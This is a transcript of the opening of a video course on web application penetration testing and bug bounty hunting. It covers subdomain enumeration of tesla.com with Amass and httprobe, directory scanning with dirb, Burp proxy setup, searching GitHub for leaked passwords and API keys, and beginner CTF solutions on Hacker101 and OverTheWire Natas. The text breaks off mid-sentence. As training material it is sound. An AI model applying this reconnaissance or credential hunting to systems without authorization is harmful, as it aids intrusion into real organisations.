All right, well, welcome to this course. I want to give a little bit of a preface to this course. So, as you go through this course, a couple of things you're going to notice. One, I actually got this microphone about halfway through the recordings of it. And two, the course is going to start out with a really old version of Kali Linux, and that is because I started this course several years ago and I ended up doing nothing with it. And recently I decided to go ahead and finish it and just upload it to YouTube. So that is the backstory to this course. And so at the end of every what would have been video, I will make a redundant comment like see you in the next video, see you in the next lesson. So please spare me the humiliation of commenting that over and over because I just piled it all into one video. I decided that would be easier to just have it all in one place for you to click through. So go ahead and enjoy the course. The first half of it is on web applications, and it's tailored towards web application penetration testing and bug bounty hunting. And then the second half is more towards the OSCP and networking side, but both are necessary if you want to go on and become a penetration tester and take the OSCP or be a bug bounty hunter. Also, I just wanted to mention that this course is meant to be used for good. It is not meant to be used to be malicious. And a few things we're going to cover in this course is server-side request forgeries, local file inclusion, remote file inclusion, SQL injection, cross-site scripting, Active Directory, buffer overflow, logic errors, and I'm sure I'm forgetting others, but there's a lot that we go over in this course. I will see you as we begin.
In this video, we are going to be talking about recon. This is probably one of the most important parts of bug bounty, especially bug bounty, because you need to be finding subdomains and places that people haven't been looking, people haven't been searching for bugs, and the only way you're going to be able to find the path that's least traveled is through your recon. Everybody is going to the main page, everybody is logging into the main page and testing the main pages. And so recon is where you're going to find the random subdomains, and you will find the random directories and places that are not being checked. And so recon is probably one of the most important parts of the bug bounty process, or testing any web application. There will be hundreds of thousands of people that are testing the main page, and so you need to remember that the subdomains and the random pages are the ones that are going to be your bread and butter, not the main pages. I'm not saying everything on the main pages haven't been found, but what I am saying is it is going to be easier, especially as a beginner, when you are searching through areas that have been less traveled. You're going to want to go to the places that other people haven't gone, and you will be more likely to find bugs there. And when we are doing recon, one of the very first things we should do is identify the target. This is something that we should think is very basic. It's something that we have to do right up front, because you need to identify the target on the program that you're going to be using, whether it's HackerOne or BugCrowd, and then you need to read the scope so that you know what you are looking for. So let's go to BugCrowd, and we are going to look for their programs. And this is going to be the very beginning of any recon, is looking at their scope. One of the popular programs on BugCrowd is Tesla. And so we can open up Tesla, and then once we're inside, we'll look at their scope. And scope is what's very important, because it'll tell you what you can and what you cannot do on their program. So in scope, the little star here means everything on tesla.com. So you'll be able to use their subdomains. Anything that relates back to tesla.com is in scope. So they have a very wide scope. And then out of scope, if you come across these sites in your recon, you can just make a note that these are out of scope. These are not websites that we'll be testing. And then one other thing they'll have that's in scope and out of scope are vulnerabilities. And so out of scope vulnerabilities are usually ones that involve social engineering or something that causes a user or someone of the company to give out information that you shouldn't have. Those are usually the most common out of scope. One thing that you will notice in programs that's really important is some programs will tell you that you are not allowed to scan their networks, and that's really important for you to notice when you're scrolling through and you're reading about scope, is that if they don't want you scanning their networks, then don't scan the networks. Some programs, it's okay to do that, and in those programs I would actually encourage it because the tools are really helpful and that's why they're made, and it can save a lot of time. As you're going to find out, I am a big fan of manual testing, and it's fine to run tools. We're going to run some tools, we're going to go through some tools starting in the next video, but I always promote manual testing. So with that, we have found our target. We'll use Tesla for our recon that we're going to do, and we will go through the scope. I would encourage you to read the scope so you can kind of see. I would actually encourage you to read the scope of several different programs so that you can kind of see what people are looking for, and then once you go all the way through the program, go back through and look at the scope of different programs so that you can see what vulnerabilities you're looking for, what vulnerabilities are out of scope, which ones you've learned about, and which ones you can test for. So with that, we'll begin looking at some different tools for recon in the next lesson. Okay, in this video, we are going to install a couple of tools. Thankfully, they're pretty easy to install, and then we're going to run them and kind of see exactly how recon tools can save us some time and get things going a little quicker than if we just had to do everything manually. So the first thing I want you to do is to open up your terminal and type in sudo apt get update. You will probably be prompted to put in your password. You'll type in Kali. You won't be able to see it in your terminal, but it types it in anyway, and then hit enter. This updates all the packages that you have on your machine and gets us ready for the next install. And I should explain that when you use sudo, it is your super user. So there are commands that you will give to your computer, and it will want you to have the root password, which is Kali, unless you've changed it. And so we will use sudo randomly. I will be honest, I do not always know when to use sudo and when not to. Usually if something isn't working, I try and use sudo. And if that doesn't work, then I'll have to figure something else out. But usually that will make most programs run if you can't figure out what is going on. And so once you finished your update, we're going to install something called gedit, and it will be pretty much the same. We're going to go sudo apt get install, and then we'll go gedit, and then you'll hit enter. Oh, I got sudo spelled wrong. And that will run, and then you will be able to use gedit to edit different files. And I like to use gedit when I am making text files if I forget to put an output, like I did with AMAS over here. And actually I ran this as sudo just in case you tried to run AMAS Intel only. I had to run sudo to get it to run, and so if you were running into problems, that might be it. And so now that we have our gedit installed, we'll go ahead and put this into a file so that we can run it in the next tool we're going to download. But before we get there, if you're new to Kali Linux, we are in the home directory, and so we are going to need to change directory, so it's to cd, into a different directory. But before we do that, just so you can see what we're looking at, you can press LS and hit enter, and that's going to list all of the directories we can move into. We're going to move into the desktop, and so we're going to go and change directory into desktop, and it is case sensitive, and you can press tab to auto finish, and then you hit enter, and now we are into our desktop, and you can LS and you can see I have all.txt, which I actually think is empty right now. And so you can see this is how we move around in the Linux machine, and I am going to gedit, and we will call this tesla.txt and enter, and this will pop open our text file, and I'm going to just copy some of these in for demonstration purposes. We'll put those in there and then we'll save them, and that should save to our desktop. And just in case this is a little confusing working in a terminal, starting out in the terminal, as you think about directories, and we're going to come back to directories when we get into URL testing, but as we are looking at our directories, as we're changing directories and we're moving around, a good way to visually see this is you have your home directory, and all we're doing is changing around, looking for files inside these directories. And so to go forward, we would type in Kali, and then you can hit enter, and it'll take you to a different directory. All we're doing is this, only inside the terminal. And so if we wanted to go into our desktop, you could type your desktop, tab over, hit enter, and there's our files. And to go backwards in directories, you do 2 periods and a /, and that will take you back 1 directory. So as you see us moving around in our terminal, and you see changing directories and looking at directories and making files, that's kind of how it works. And you can actually come in here and you can play around in this folder so you can get the hang of it. And just in case you're new, I remember when I was learning this, I was like, man, I am going to suck forever. I'm never going to figure this out. I'm never going to remember these commands. The terminal is just really hard for me to use. You will get there. It will get easier. You just have to continue pushing through. And so there's one more tool that I want to install before we get to moving on with our recon, and it is HTTP probe. And this tool is really useful, and as we go to install this tool, I will see you in the next video. Okay, we are going to dive right into our first tool, and the first tool is AMAS, and it is put out by OWASP, and it is a super useful tool in many different ways. We're actually just going to look at the surface of the tool and grab subdomains without having to get too much into the code and trying to figure out an in-depth way of grabbing domains, when I think you can get the majority of subdomains fairly simply. So we're going to go through this the simple way, and in the intermediate course we'll go through the tool in more depth and look at exactly how we can find more random domains with AMAS. But for now we're just going to look at the simple way of using it, and to be honest, I usually just do what I am about to show you. Very rarely will I go really deep with AMAS. And so what we'll do is you can just type in AMAS and you can see the tool. There are 2 different ways that I use this. The first one is with Intel, and the second is with enum, which is just for enumeration. One of the things that I first like to do just to grab subdomains and to grab them really quick is to type in AMAS Intel, and then you can hit enter, and this will pull up your options that you have with running the Intel portion of the program. And you can see there are different things you can do. You can feed it ASN numbers, you can feed it a CIDR range, and we'll get to that later. But for now, we're just going to run the whois with the domain, and this should pull us up subdomains. Before we get to doing just that, there's one other thing I want to mention. Every now and then I will use the -IP, and it will give us the IP addresses as well as the domain names. And if I use the IP because I want IP addresses, I'll actually do it separate, because the next tool we're going to be using, you're going to want just the subdomains by themselves in a text file. And so when we are looking for subdomains with AMAS, you can run it just AMAS Intel, and then we'll run whois, and then the domain tesla.com, and then you would run it. And it sometimes takes a second to pull these up, but we will also I've actually already ran it, so you can see exactly what it looks like. We ran AMAS here. I ran it. Oh, that's the enumeration. That's too far. We're going to get to that. This is the one we just ran, so this pulls up all of these subdomains here for us. And you wouldn't want to just run this for tesla.com. Remember when we were looking at the scope of Tesla Motors, get the right tab here, we saw that you can have Tesla, you can have Tesla Motors. You would want to run AMAS on Tesla Motors. You would want to run it on Tesla.services, and you'd want to run it with each one of these so you can pull up all of the different domains with AMAS, not just Tesla.com. And you may have some overlap, but that's not a big deal. If you visit the same site twice, you'll recognize it, or maybe you'll see something the second time you didn't the first time. And so you can actually output these to a text file, which I forgot to do. I'll just copy paste them. And then once you run this usually runs really quickly, and you can pull these into a text file and begin doing more recon, or you can go ahead and run AMAS enumeration, and this will query all of these different search engines and look for subdomains. And so you can see it takes a lot longer. You'll find different domains, and it's really helpful to run more than just one program when you're looking for subdomains. And then we'll get to brute forcing for subdomains later as well. And as you begin to pull these, you can begin looking through them, seeing what looks interesting, what looks in scope, what's out of scope, and deciding exactly what your next step is. Usually when AMAS is running or I have other tools running, I like to go to GitHub, which I've actually already went here and ran a couple of queries just to see what I could find. And when I'm in GitHub, first of all, actually GitHub, I should explain what it is. It's a place that software developers will save their documents, their code, it's a sharing platform where they're able to share their code, they're able to share what they've written, and they can make commits, and they can pull requests, they can make branches, they can fork other people's code, they can modify it. And what happens is usually junior developers make the mistake, I shouldn't say they usually make it, they will make the mistake of pushing information, sensitive information, stuff that shouldn't be made known to the public. And one of those things would be passwords. You can see I just looked Tesla Motors, and then you just type in password. You can just go Tesla, and then you can just type in key and see if any keys pop up, or you can type an API or an API key, and you can just start to browse through and see if anybody has pushed anything that shouldn't be on here. This is actually a bug if you find an API key or you find a password. Sometimes you can find usernames that shouldn't be shared. and information, just an information disclosure. And so when I have tools running, I'll usually come to GitHub and just look around. I'll actually sometimes open up different code to different, if they're open source. If I find a web application that looks interesting, rather than just looking through the source code, I'll come and see what I can find on GitHub and maybe find out more information about the specific application and what's running, how it's been written, and just look for little bugs that way. And so this is one thing you can do when you're running tools is actively be continuing your recon, searching around, seeing what you can find. And sometimes I'll actually do just this. I will run AMAS on multiple different tabs, and sometimes I'll have 4 or 5 tools going, running different scans, different brute forcing tools, just so that I don't have to wait for each one to finish before running the next. So we'll pause this video here, and then in the next one I'll put these into a text file and we're going to download a new tool. I'll see you in the next video. Okay, so I have had quite a few questions about using AMAS, and a few of you have had problems with it. And so I want to go through a little bit more of an in-depth approach to AMAS, one that I use when I really want to get down to the nitty-gritty. It's a little more complex, and so it may be that you need to pay a little closer attention and may have to go through this a few times to really get the hang of what's going on. And so I want to just start out by saying the script that I'm using in here is going to be in the course resources, so you don't have to sit here and type it out. You can just pay attention to what's going on. I'm not really going to explain what's going on in the script because it really doesn't matter. All that matters is that you know how to use it and what the output is. So there is something in AMAS that we can look for, or we can use in their tool, which is the ASN number. And so we can actually find ASN numbers on our target with this website right here, BGP. So the way I actually find this website here, our BGP website that's going to pull down our ASN numbers for us, is by coming over to Google and punching in right here. You just go BGP Hurricane Electric and it should just pop up, and it does. It's this one right here, and this is the tool that we're going to use to find our ASN number. And so you can go ahead and just type in Yahoo, and it's going to pull down a bunch of our ASN numbers here we can scan for, and we can find a bunch of targets and subdomains that we can sort through. And I went ahead and pulled up HackerOne already, and I went to Verizon Media and scrolled down to make sure that Yahoo is a web app that we can go through and we can run recon on. If you're not doing this at this time, like when I shot this video, I believe it's March 27th, 2021, you can go ahead and make sure that it's still a program that you can run recon on. And so we can, and what I want to do is I just come over here, I type in Yahoo, and I will highlight all of the ASN numbers, and eventually you're going to hit the bottom of our list here and we can just copy it. I see I missed one, but it doesn't really matter. And what I do here is I make sure this is where my scripts are at. I believe I have it in tools. Yeah, here it is. And so what we'll do is we will go ahead and make a file with these ASN numbers. We'll just call it ASN gedit, and we'll call it asn.txt. So we have a text file, and then we just paste these in, and you can see this doesn't look nice. All we want are these numbers right here. And so about a year ago, I went ahead and wrote a little Python script, which is in the course resources, to strip away all of the garbage that we don't need. And just so you can see it, here it is. This is what it looks like. And make sure when you save this file that you have it as a .py file. And so it's a pretty simple script, runs pretty easy. I've messed with it a few times because I used to like to have all the numbers together with commas because that's what AMAS wants, but AMAS will actually hang after a while, and so I went ahead and split it all apart And you'll see what I'm talking about here in just a second. So the way we'll run this script is we'll type in Python 3, just like this. And then we'll type in whatever you decide to save your Python script as. And then we pipe it over here. And we actually have to type in, and we have to call out our asn.txt. And I typed it backwards. So don't do that. So what we actually have to do is come in here and we will have to cat out our file, which we're not going to do the file.txt. We're going to do the asn .txt, and we're going to pipe it over into our script, this script right here, the bge.py. And so we'll type Python 3 or bge.py, and that gives us the desired output. And we have all these numbers here now. We have these our ASN numbers that we need. And what you can do is you can just copy these and you can save them into a different file, so that way you have it. And so we'll gedit and we'll go ahead and just save this as our ASN numbers, and then we can save it. And then we'll have this text file here for us all the time, and we don't have to rerun this script. So we'll go ahead and close this out. So what we're going to do is go ahead and grab one of these ASN numbers, and I'll show you how to run this in AMAS. So we'll go AMAS Intel, and then you can hit enter, and it'll actually tell us up here. We have this -ASN and then the value. And so we'll go -ASN and we'll put in our ASN number here, and then we just hit enter. And now while it runs, it'll actually go out and search this ASN number, and it will pull down all the subdomains that come in under this ASN number. And what you do after this is it's going to pull down the subdomains, and then we'll go ahead and continue on in the program, and we can further expound upon our enumeration and our recon. If you have any further questions, please let me know in the comments. This is the first time I shot this video, so it might not be as descriptive as I would have hoped. And if it's unclear, let me know, and maybe ask a few questions, and maybe I can reshoot it. So I will see you in the next video. Okay, we're going to go ahead and install HTTP probe in this video. And before we do that, we're going to install the Go language, which I've actually already typed in here. You've seen this a few times now. Sudo apt-get install Go lang. You will hit enter. You will be prompted to enter your password. I wasn't, because I just installed this to make sure that we didn't have to wait, because it takes several minutes to install, and you might be prompted, are you sure you want to install it? You'll hit Y and then hit enter. And then once you have this installed, I want us to go ahead and hit LS, and we are going to make a new directory for our tools directory, for tools that we will be installing. I also like to put my word lists in there as well, and so we're going to make directory, and I'm just going to go ahead and call mine tools, and then I'll hit enter. You can hit LS, and then here is our new directory. So we're going to change directories, and we're going to move into tools. And then you can see it is added here, and it should be empty, which it is. Now we're going to come over here to our GitHub, but before we get there, I'll show you how we got to this page. So we're going to go HTTP probe. It'll be the first one. We will click on it. We're going to click the green button here, and we are going to, you can click this and it should copy for us what we need to clone this. If I can, you can highlight it. I'm struggling, so I'm going to go ahead and not highlight it and just click the clipboard, which should copy it. And since we're in our tools, this is where it's going to put the file for us, and we're going to type in git clone, and then we're going to paste what we just copied, and we'll hit return, and this will clone the file for us. We should be able to hit ls and see we now have the directory inside of tools. So we will change directory into HTTP probe, and then we'll hit ls again. Actually, we'll clear this so we're at the top. We'll hit ls again, and we're going to see this main.go. This is going to build it for us so that's executable. And we're going to go ahead and type in go build main.go. And now we should have an executable. We're going to change the name from main to HTTP probe, and we're going to go ahead and type in mv main HTTP probe and hit I had too many V's. Come in here, just one V, and then we'll ls, and you can see our name has been changed, but we don't want to come into this folder every time we want to run HTTP probe, and so we're going to go ahead and move it to our bin folder. And if you want to see where we're moving it to, we're going to move it to we can echo the path, and we're going to put it in this bin folder here. And so we're going to move the executable, and then we hit go ahead, and we don't have permission. Do you see this right here? That means we need to add sudo. And now we should be able to run this tool from anywhere within our directories here. And let's try again. Okay, I actually am an idiot, and you have to type, because it was trying to actually run the file, so we can type in, I think it's, whoops, help. I actually didn't make it all the way, and then this will tell us. So we can now run the file. And just to make sure we can run it from anywhere, you can cd, and it'll take us back to our home, and you can run and -- help, and it ran. So in the next video, we're going to go ahead and run HTTP probe with our subdomains that we have pulled from tesla.com, so that you can see exactly what this tool does and how it is helpful in our recon. Okay, we are now ready to run HTTP probe and test how it works and see which subdomains come back responsive. So how it works is the tool will actually send out a GET request to a browser for the subdomain that we enter, and if it gets a response, it will give us that subdomain in a list, and if it doesn't, it will actually skip over it. So the way it works, if you're actually in your home folder, you can ls, and you can cd into your desktop, because your command, the cat command, which is going to call out our file for us, only works whenever you're actually inside the directory with the file. So we're going to call out tesla.txt, and so in order to do that, you would type in cat, and then we would type in tesla.txt, and then you can see all of the subdomains that we have pulled from AMAS when we ran the scan earlier. And so what we'll do is we will run tesla.txt through HTTP probe and see what comes back as responsive. So I actually want to go ahead and call that back out so we can compare these. So we will cat tesla.txt, and then you will run that text file. You'll pipe it through HTTP probe, and it may take a second, or it will start coming back right away before it starts probing these files. And you'll actually want to run it a couple of times, because sometimes it will skip some files and it will come back with other files. And so it's not 100% guaranteed, but it does work really well. And so I went ahead and killed it. And once it goes through and it runs through and you actually get the subdomains that are responsive, I usually copy and paste them into a new file, and actually went ahead and just made one with just tesla.com inside. And so I'll show you what I did here. Instead of just having tesla.com, you would copy and paste what HTTP probe has spit out, and you'd put it into a different file. So you would go gedit, and then you'd go, you can name it whatever you want. I named it tesla2.txt, and it would pull open this, and you would paste all of those subdomains that came back from HTTP probe into a file, and you'd have it here. And the reason you would do this is because it gives you the list of the subdomains that have come back, and you will actually go visit these. I do this manually. There are other tools out there like Eyewitness that will actually go out and take pictures of the website for you so you can see what's there. I like to manually go to every single website, and sometimes it is very tedious. I have found websites that have had over 1,000 subdomains, and I will go and I will visit every single one of them and decide which ones look like they're vulnerable, which ones look juicy to me, and I will go through them. And the quickest way to do this is to download or install a I don't know what to call it, a plugin on your Firefox, and it is called Open List. And you will come into Open List for Firefox. I actually already installed this. You'll come in here, and you will, instead of, well, actually just remove it, you'll click Add on to Firefox, and it will pop up over here. You'll click Add, click Got it, and here's Open List. And so what this does is it opens all of these subdomains for us in different tabs. So all of the subdomains that came back from HTTP probe, we can go through and open them. So what I actually like to do, I'll just do it the way I actually do it, as if I was going through this. I will keep this file open because there may be thousands of websites and subdomains in here, and I will just go through and do 10, 15 at a time. I will copy them. You can come right over here to Open List, you paste them in, and you hit open, and it will open every single one of those subdomains. And you can come through here, and this is exactly what I do. I will come through here and I will look at every single every single tab that has been opened, and I will see which ones look juicy, which ones look vulnerable, and I will go ahead and I'll make a new file and I will save them, and I'll go through maybe a couple hundred subdomains at a time, and I'll save the ones that look good, look like something I want to test, something I want to browse through, and I will go through those. And so that's what HTTP probe does for you, and that's Open List, and that is how I save my files and how I go through and decide what looks good, and I actually will decide at this point what subdomains need further recon, and so that's where we're going to pick up in the next video. So to this point, we have looked for subdomains, we have found subdomains, we have ran them through HTTP probe to make sure we're not wasting time and that they come back responsive. And now once we find a good domain or a good subdomain that we want to do further recon on, what do we do? And so that's where we're going to pick up in the next lecture. Okay, let's pretend this is our juicy site that we have decided to further our recon on. And what we're going to do is run a tool called Dirbuster, or Dirb, because we're going to run it in our terminal. This is going to look for different files and directories on the web page. So if you click on models, you see this popped up right here. This is a different file or directory. Sometimes you can find directories and it will continue down that path, but you click on it and you can see we're no longer just at Tesla.com. We actually have found it actually brings us to a new link and a new file, and so we are going to look for files maybe that have been created that we were not supposed to be able to find. And so this tool actually will scan through Tesla.com and it will just put in a bunch of random directories and files here and see if anything comes up. And so the way we run this is you just type in derb, and then you would type in the full URL, so https://www.tesla.com, and then we would run this, and you'll actually see it right here. It is starting the scan and it is going to start scanning through this. And while you're waiting for this to run, there are actually other things that we can be doing while this runs. So I'll actually just let this run for a little while. Usually what we would do is you would go ahead and you would come on back to the website, and I like to click around with burp opened, and so I'm going to actually set that up now since we haven't set that up yet. And you can actually see that we are finding 403s. And so what we'll do is we can let that run, and burp is going to be our proxy that we use. We are going to use this a lot throughout the course, so it's good to set it up now, and it's good to get used to seeing it because we're going to be using it. Go ahead and close that. Not going to update it. Yes, I'm sure. We'll go next. We'll start it up. And here we go. And as we set up our proxy, we are going to come back to our browser. We'll open a new tab. We're going to go to Preferences. We'll scroll all the way to the bottom. We'll click Settings, and then this is going to be our proxy configuration. I actually went ahead and typed this in earlier. You'll type in 127.0.0.1, and then we'll come over here and go port 8080, and that's going to send all of our traffic through burp, and you will click this little box here so that everything goes through, and then you will click OK. And then once we get in here, you can come in here. Your proxy is automatically going to be on, and I believe we're going to have to add the certificate. So what we'll do is come back to our preference. You can type in burp. I actually think it is HTTP, and then we go burp. Yeah, burp suit right there, just like that, and we'll hit enter, and we'll come to this page, and this is where we get our certificate. You will click this, you will save the file, you will click OK, and this will save to our downloads. So we'll go new tab. You can CD over to your downloads if you want to see it, and LS, and then there's our certs, our certificates. And then in order to install these, we're going to go back to our system preferences. We're going to go to privacy and security. It has been a while since I've done this, so we're going to go view certifications. I'm hoping I get all of the right places on my first go. We're going to import. We're going to click on these. These are the ones we just downloaded. We will click trust and trust, and then you click OK, and then we will click OK again. And now we won't get this security issue, and everything should go through and run into our proxy. and here it is. And so to turn that off, we'd go to our proxy and we'd turn our intercept off, and now pages should load just fine. So what I like to do when I have tools running, like we do over here, which I'm going to go ahead and kill so we don't just keep sending requests to Tesla, is I like to come into Burp, and you can come into your target. You can see all the places we have visited, and you can see this is a GET request, and you can come through and you can look, and this is another form of recon that we can do. You can actually see what's going on, and this will all make sense more as we go through the course. But because we're in the recon, when you're running your tools, a good thing to do is just to come in, and you can have your intercept off, but make sure your proxy's on, and all your traffic is being run through Burp here, because you can actually, we'll see, you will actually be picking up all of this traffic. All of those requests will be coming through here, and you can come back later and you can go through these files, and you can look at, here's a post request, and you can go through and look and see what you're getting as a response, and where things are going and what's coming up. And so this is another form of recon while you're just trying to figure out what's going on the website, how it works. Maybe you sign in and you're just clicking around on all of the buttons, you're just getting a feel for it, and then later you can actually come through and you can see what's going on over here in your Burp. You can actually see the request, you can see what's going on, you can see the IDs, and you can start to poke around and look for bugs over here, as well as running your recon tools over here. So it's actually killing two birds with one stone. You're running recon here passively through a tool, and then you're actually learning how the web application works, and you're saving the GET request and the POST request and that information over here. Okay, we are going to be starting our URL portion of this course, just what exactly we can learn from the URL, what we can do in the URL, which is actually quite a bit. If you have a programming background, you can feel free to skip over this lesson, as we're just basically going to be talking about what URL is and what we can look for. The URL is a basic understanding of the root domain, or just a domain that we can access, and as you access different parts of the site, you will be going into different directories, as we've already shown earlier, and you'll be navigating through files within the domain. And so the URL is actually something that you can learn about how the website functions. You can look, sometimes you can see information, personal information, sensitive data can be stored there. So for example, if in this URL it had like an ID of my name or my email address, those are things that you wouldn't necessarily want in a URL, or specifically if a password was in there. Those are things that you could actually report if you had sensitive data in there. But we're basically going to be looking at how we can manipulate the URL to our advantage, and what we can do specifically with pages. So I remember when I first started down this path of wanting to learn web app pen testing, sometimes you'll go to a capture the flag website and it will be just a blank page. And I remember coming to the blank pages and thinking, oh my goodness, I have no idea what I'm supposed to do. But for you, we've already gone through the recon portion of this course, and you know to go to Derb and just start looking for directories. And then also, we're going to be looking at the source code. I mentioned it briefly earlier, but it's something that can be really helpful, and I'll show you why. So I made this very, very basic HTML website. It's very basic, so if you're a developer, don't laugh too hard. And so if you just come here and you click, and
we go to a different page, you can see we have a button and you click it, nothing happens. And then we have another link and you click it and it just takes us back to the index.html, and we click it and we go back to page 1. These are things, what I'm about to show you, something that Derb would probably find, but if it doesn't, you can kind of see how this is going to work. You can come in here and you can just go page 1, and then you can go, okay, well, if there's a page 1, is there a page 2? And then you hit enter. Oh, page 2 is blank. And then you go page 3, and then you hit enter, and we hit a forbidden page. And so if we have this forbidden page, there's something on it that we're not supposed to be able to access. Well, how can we get there? And this is when remembering looking at source code can be really helpful. And so we can come over here and we can go view page source. And you can look through and see just how basic this really is. And you can see that we have something hidden. And you can go, there is this directory or this file for more information. And so you can come here and you can copy this and you could paste it in up here. Another way to come across this is you can see that this is hidden. We're going to cover this in more detail as we go through the course. But as you go to the source page, one other thing that's really helpful to look through is to right click and just go inspect. And you can inspect what is on the page. It's basically the same thing that we saw was the source, but you can see where this is hidden. Sometimes you will have login pages and there will be hidden fields that you can open up and try and manipulate. And you can just actually type this into text and it'll actually show up on the page as plain text. And so we have this file here. If you remember, we had page 3 was forbidden, and we're not able to enter into it. But we can try. This HTML actually won't be on any websites. I just didn't take the time to remove it, and so we'll ignore it and act like it isn't there. But if we remember from this right here, we have this edit 3, which I'm guessing is our page 3, and then we can hit enter. Well, I typed it in wrong. We have, I'll just copy paste it. Or, oh, I'm struggling. We can copy it. We can bring it up here and paste it in. And then this is the forbidden page where you can access files. Now, we're actually going to go and practice something very similar to this. And when you do this, what you're going to need to do is go to Google. I would encourage making a new Gmail account and then going and signing up on Hacker1. And then we're going to be using Hacker 101 to practice what we just saw, and for us to be able to gain some practice. It is a CTF, and so it's a place where you can go and practice some of the stuff we're learning. So you will see some of these very basic, boring, static websites that I'm making throughout this course just for the purpose of showing you the basic concept, because there are not a whole lot of places to practice your bug bounty skills and your web app pen testing skills. And so rather than me try and show you how to perform these on one of those practice sites, I decided it'd be easiest if I just gave you the basic concept of how it functions within a static site. And then I'll take you to places to practice, and I'll actually have them linked in the resources, so you can just click on the link and it'll take you to Hacker1 so that you can create an account, and then also to take you to Hacker 101 where we are going to practice. In the next lesson, I'm going to show you exactly where we're going to practice and how to get started. So I'll see you in the next lesson. Okay, we are going to
set up our HackerOne account, you can actually come into Google and type in Hacker 101. This is going to be their capture the flag practice area, and you can actually click this. And what will happen for you, I've already logged in, but what will happen for you is it's going to say, it'll bring you to a login page, and once you reach the login page, you will have to go and create your own web account and your own account with HackerOne. And once you create your account with HackerOne, you can navigate back to Google, type in Hacker 101, and then click on the Hacker CTF, and then it will bring you back to login. You will click the blue button, and then you will log in, and it will bring you to this page. And if it doesn't bring you to this page, you have a navigation bar very similar to this one, and you will just click on CTF, and then you will be at this page. But you're going to have to register in order to reach this page. And then what I want you to do as we begin working with actual vulnerable websites is go ahead and click go. This is going to be the very first challenge I have for you. Once it loads, you're going to be brought to this page, and the way HackerOne has set up their training program is that you will have flags, which is just it'll say flag, and then it'll have a bunch of random numbers. And once you reach that flag, you will know you have found the area of the website that you were not supposed to find or is supposed to be vulnerable. And so with that, I want to have you pause this video and see if what you've learned in the last lesson, you can figure out how to find the flag all on your own. So with that, pause the video and give that challenge a go. Okay, if you got it, that is great. If not, I'm going to go ahead and reveal to you how to find this specific flag. But before you do, I would challenge you to go back and watch the previous video and just see the steps that I walk through, and then go ahead and come back here and give it a try, because I am certain with what we have covered, you can find this flag on your own. So the way we find this very first flag is by coming in here and just right clicking and then going to view page source. And then we can look at the page source and we can see what is in here. And it has a background image, and then here it is, background.png. Just a little bit ago, actually came in here to try this, and my guess was this is going to be a file that we were not supposed to be able to access. And so copied this, came over and pasted at the end of our URL, paste and go. And I that apparently didn't work for me. We're gonna paste it and then hit enter, and then here is our flag. We're going to move on into the next video, and I'm going to help you get set up on what you're looking for, and then I'm going to turn you loose and see if you can find the next flag on your own. Okay, we are ready for challenge number 2. We are going to come into the first easy program we can enter. We're going to only find one of these 4 flags. We'll actually come back later. We're going to go ahead and click go and pull open this vulnerable website. And I'm going to turn you loose once this loads, because everything that we have done so far that we have covered should give you everything you need to know to find the flag that we're looking for in this specific capture the flag. And so with that, I want you to go ahead and click around in the website and see if you can find the flag. And so we can go ahead and pause the video now and see if you can solve the first challenge. I believe we've covered most everything you need to know to find this flag. And so the first thing that we would do is just start clicking around, and you could maybe make a page and see what happens. We've got a page here. We're on page 9. And so we can go back, we can edit this page, and we can see we can edit our page 9. We can go back, we can click on the markdown test and click the button that doesn't really do anything. Can come in and view the page source. And we can look around. There's not really a whole lot here for us. And so we can go back and we can go to home. We can go to testing, and just as we continue to click around, a couple of things that stand out to me in our URL is that we have this page. So we can come into, let's just go into the page that we created. We can come in here and just go page 1, page 2, page 3, not found. Well, we know there has to be at least 9 because we have created page 9. So we'll go to 4, 5, and then we hit the forbidden page. If you remember in the example that I showed earlier, we have seen a forbidden page before, and then we'll keep going. We'll go all the way up to page 9 and look at every single one, every single option we have, because we know that's how far we are as we've created. So we have all of these, and then page 9 should be the one we created. So what page was that was forbidden? It was page 5. So how do we access this? We can go view page source. It says we don't have permission, and it is forbidden. Well, there is another way to view this page. If you remember from the example website that I made and showed earlier, you would know that we can try and get around this because we have the option to edit this page. And so if we edit this page and we know we can edit the page that we made, maybe we can edit the page that was forbidden. So we can come in here and put in 5, and there it is. There's the flag. So I hope you found this. I think by now we've covered everything needed to find a flag like this in the URL. I have a few more challenges for us to go ahead and try. They're going to be on a website called Over the Wire, and I will actually help you navigate to that page and get logged in. We don't actually have to make a user or create a user, which is very nice, and so it's very easy to access and to practice on. And so with that, I'll see you in the next video and we'll get that all set up. Okay, we are ready for a few more challenges. And so we're going to go ahead and head over to a website called Over the Wire, and you can click on it or type it in. And we're going to go ahead and click on Nodus. This is where we're going to be working out of. And we can click on that and it will pull it open. And this is where we're going to get started. I'm going to go ahead and open a new tab to keep this one open. So we're going to start on level 0. Password is going to be level 0. And so all we have to do is copy this URL and paste it in, and then hit enter. And our password is going to be Nodus 0 and Nodus 0, and then we'll hit enter. And every time you find a new flag, and you will come up here and you will change the 0 to a 1, the 1 to a 2, the 2 to a 3, and it will prompt you and say username, and so we have Nodus 0 right now. The next username will be Nodus 1, and then the flag that you find will actually be your password for the next level. And so we have gone over everything needed to find this first flag, and I want you to go ahead and try and do that now. Okay, hopefully that went well for you and you were able to find the first flag. But before we get into that and get going too far, there's one thing I forgot to mention in the recon portion of the course, something that we will use in Nodus and you will use later on in your bug bounty hunting career, is the robots.txt file. So you can have, the way we get to that is you just hit a / and then you hit robots.txt and then you hit enter, and it will take you to a page. This one doesn't have one set up, but it'll take you to a page that doesn't allow search engines to find. And so sometimes websites will have files that they're hosting online that they don't want Google displaying. And so they'll have a disallow or allow for Google and Bing and Yahoo and other search engines to go through and crawl their website, and it will go through that robots.txt file and will say, do not allow Google or Bing or Yahoo to crawl through these files. And so it's always a good thing to check the robots.txt and roll through and see what's allowed and what's disallowed, and then visit those disallowed files and see what's in there, or those domains or directories that we find. And so with that, we'll go ahead and solve this challenge. And so I hope by now you know one of the first things we do is to go ahead and view the page source, or you can inspect the element. Either one works. I like to view the page source because it gives us a more complete view. And so one thing I want to mention about the Nodus levels is everything inside this head tag, which will be from here to here, doesn't have anything to do with the level. And so sometimes you'll see the password for the previous level up here, which the next one would be right here. This is our password for this challenge. And so I hope you found this. And next time, if you view the page source, this password will be right here. And just so you know, it's inside the head tag. And so it's not actually anything that's going to be relevant to us. And so here's the password for the next level. So you can go ahead and copy this. And the way we get to the next level, if you remember, is come up here, go to Nodus, change this to 1. It will prompt us for the username, which is going to be Nodus1. And then our password, which we just found in that flag, and we hit enter, and that takes us to the next level. And if you want to go ahead and try and solve this challenge, you can do that now. I'm going to stop this video and we will solve this challenge in the next lesson. And so this one says that we are not allowed to right click. It's been 